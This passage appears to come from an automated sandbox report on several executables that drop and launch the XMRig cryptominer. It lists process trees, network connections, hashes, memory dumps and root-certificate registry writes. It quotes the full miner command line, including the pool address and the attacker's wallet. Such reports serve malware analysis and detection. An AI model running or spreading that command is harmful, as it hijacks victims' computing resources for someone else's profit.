36865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
NL 23.62.61.121:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 121.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 249.138.73.23.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

memory/4452-16-0x0000020B38A00000-0x0000020B38A20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4452-17-0x0000020B3A200000-0x0000020B3A220000-memory.dmp

memory/4452-18-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-19-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-20-0x0000020B3A220000-0x0000020B3A240000-memory.dmp

memory/4452-21-0x0000020B3A240000-0x0000020B3A260000-memory.dmp

memory/4452-22-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-23-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-24-0x0000020B3A220000-0x0000020B3A240000-memory.dmp

memory/4452-25-0x0000020B3A240000-0x0000020B3A260000-memory.dmp

memory/4452-26-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-27-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-28-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-29-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-30-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-31-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-32-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-33-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-34-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-35-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-36-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-37-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-38-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-39-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-40-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-41-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-42-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-43-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-44-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-45-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-46-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-47-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-48-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-49-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-50-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-51-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-52-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-53-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-54-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-55-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-56-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-57-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-58-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-59-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-60-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-61-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-62-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-63-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-64-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-65-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-66-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-67-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-68-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-69-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-70-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-71-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-72-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-73-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-74-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-75-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-76-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-77-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-78-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-79-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-80-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-81-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-82-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-83-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

memory/4452-84-0x00007FF60D310000-0x00007FF60DE13000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:52

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1797s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 130.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
NL 23.62.61.138:443 www.bing.com tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 138.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3184-16-0x000001CFE49D0000-0x000001CFE49F0000-memory.dmp

memory/3184-17-0x000001CFE6310000-0x000001CFE6330000-memory.dmp

memory/3184-18-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-20-0x000001CFE6330000-0x000001CFE6350000-memory.dmp

memory/3184-19-0x000001CFE6350000-0x000001CFE6370000-memory.dmp

memory/3184-21-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-22-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-23-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-25-0x000001CFE6330000-0x000001CFE6350000-memory.dmp

memory/3184-24-0x000001CFE6350000-0x000001CFE6370000-memory.dmp

memory/3184-26-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-27-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-28-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-29-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-30-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-31-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-32-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-33-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-34-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-35-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-36-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-37-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-38-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-39-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-40-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-41-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-42-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-43-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-44-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-45-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-46-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-47-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-48-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-49-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-50-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-51-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-52-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-53-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-54-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-55-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-56-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-57-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-58-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-59-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-60-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-61-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-62-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-63-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-64-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-65-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-66-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-67-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-68-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-69-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-70-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-71-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-72-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-73-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-74-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-75-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-76-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-77-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-78-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-79-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-80-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-81-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-82-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-83-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

memory/3184-84-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:55

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca